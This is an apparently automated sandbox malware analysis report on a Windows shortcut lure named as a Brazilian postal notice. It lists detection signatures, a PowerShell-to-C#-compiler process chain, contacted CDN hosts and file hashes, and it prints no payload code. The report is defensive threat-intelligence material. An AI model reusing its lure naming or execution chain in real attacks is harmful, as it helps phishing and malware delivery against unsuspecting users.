Malware Analysis Report

2025-01-18 14:04

Sample ID: 240613-czx4ravejm
Target: a3894901d5099b875b8b0f7226b1904d_JaffaCakes118
SHA256: f17e4e745a25bca04647fa4fc056c44835190a36d30b7cf467351ea33199bb6b
Score: 10/10


Analysis Overview

Score
10/10

SHA256

f17e4e745a25bca04647fa4fc056c44835190a36d30b7cf467351ea33199bb6b

Threat Level: Known bad

The file a3894901d5099b875b8b0f7226b1904d_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 02:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 02:31

Reported

2024-06-13 02:34

Platform

win7-20240611-en

Max time kernel

121s

Max time network

126s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en 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

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2251.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 1361227624.rsc.cdn77.org | udp
GB | 89.187.167.7:443 | 1361227624.rsc.cdn77.org | tcp
GB | 89.187.167.7:443 | 1361227624.rsc.cdn77.org | tcp
GB | 195.181.164.17:443 | 1361227624.rsc.cdn77.org | tcp

Files

memory/2748-38-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

memory/2748-39-0x000000001B520000-0x000000001B802000-memory.dmp

memory/2748-40-0x00000000022C0000-0x00000000022C8000-memory.dmp

memory/2748-41-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-42-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-43-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-47-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline

MD5 c9c37412c4e78ea0e0ca3395102689a0
SHA1 21688e857f03f11852a99da078f9125ba42f2110
SHA256 08ea5275ed60fb83fd7485f72ce364b874242c37a17683225fc64849748cb506
SHA512 a1f9ad50d2b27c8700cd28af0c05cb7a67ef9a1b438289466c4c867fbf3a3a6bd8348eb59148d3c187fa8f6873fe4bf53baa5714d7d6614ada96a8d399beeed0

\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

\??\c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp

MD5 9053cace7763f13f477946bdf6264ec4
SHA1 c4607d0d3064e64f6cfe155cce87b1708dc5946c
SHA256 d20ac6c682187207ea711de5d029711a87c150d2fa145764630d6dc09a37468f
SHA512 97ddf59ec90a6ca55c8862e57be9f42afb815cf0763c2126cd92355c836506b50294bd074e60510707f65d230273fab3776d210af1c42db3d1afdde94780c59d

C:\Users\Admin\AppData\Local\Temp\RES2251.tmp

MD5 4d3d7cb4bc4ed06b00551335e61f724f
SHA1 14416124515d673af368d23a5fe63e95bb857778
SHA256 192ce989995a2c53d6fbc3a99c5203528b68ea9178e47d0ab65a94e9b4f8c143
SHA512 08ed498642cbf8742a2274175a25df17496d4c84b118febcff68eb21a16fd182d75322d42a0e2e88d6e5b696b8b5f7823644df942c47521c5bf244e896846bf6

C:\Users\Admin\AppData\Local\Temp\vaotr-rh.dll

MD5 519f0f8988678e2d402c51e0599a04d7
SHA1 4a75e96d4a821ca721c85d574a187bfd50ca62a0
SHA256 1d9a8f5011c76464941831f04933d57367c8e109de7b876667b3118c52ef1b01
SHA512 a32f8225001b78ddf9e8a669df920213b7a36b96a7cfa52caed7b15588f8f4a1ce49a051ddaf481a4a32dd4e0a7e5bba5f6cabe34cc79f7e85adcd9e860541a2

C:\Users\Admin\AppData\Local\Temp\vaotr-rh.pdb

MD5 dfd498ea7e752d5186c7e0e20e23324c
SHA1 a5014734774e36a917097d320c826328b47a3f6a
SHA256 1a595fe7a0c2ec07c5689ed4196c7448121a5a4824cd2d0153c98bfadcb7d748
SHA512 7c6a7638a5c49a0cd1919ff53bcd3d478f7eb1b268381cdd1e13d1a4ded2cb3d342b924702fcf9d55cef3ea289f1eda77d62a14c295d7f89002d16a866959e65

memory/2748-58-0x0000000002C60000-0x0000000002C68000-memory.dmp

memory/2748-61-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-62-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

memory/2748-63-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

memory/2748-65-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 02:31

Reported

2024-06-13 02:34

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en 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

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 1361227624.rsc.cdn77.org | udp

Files

memory/4268-2-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

memory/4268-3-0x000001E9CFC40000-0x000001E9CFC62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hp2wrhz3.ztt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4268-13-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/4268-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline

MD5 c7c971702ae33f87a3c605e7f9a8e3c2
SHA1 514d554d797228435d6a0751801826f058c0ed29
SHA256 aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e
SHA512 c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39

\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP

MD5 32f206c989422b3df2f6225c9ac5f9be
SHA1 748aef167a738192b6ef21c964c30d9b169d2e4d
SHA256 5c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c
SHA512 edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02

C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp

MD5 d86f725d547cb238fc0e460a6ec552f5
SHA1 2928afba43f00889d5e35240c7efb3d94c6e1918
SHA256 96323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81
SHA512 a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017

memory/4268-27-0x000001E9CFC90000-0x000001E9CFC98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.dll

MD5 0c39411b5d7354d62bc468e1ecc003cf
SHA1 f303e17b70669aafd6a78621c683cbbc0e9d68b3
SHA256 d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb
SHA512 00c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641

memory/4268-31-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp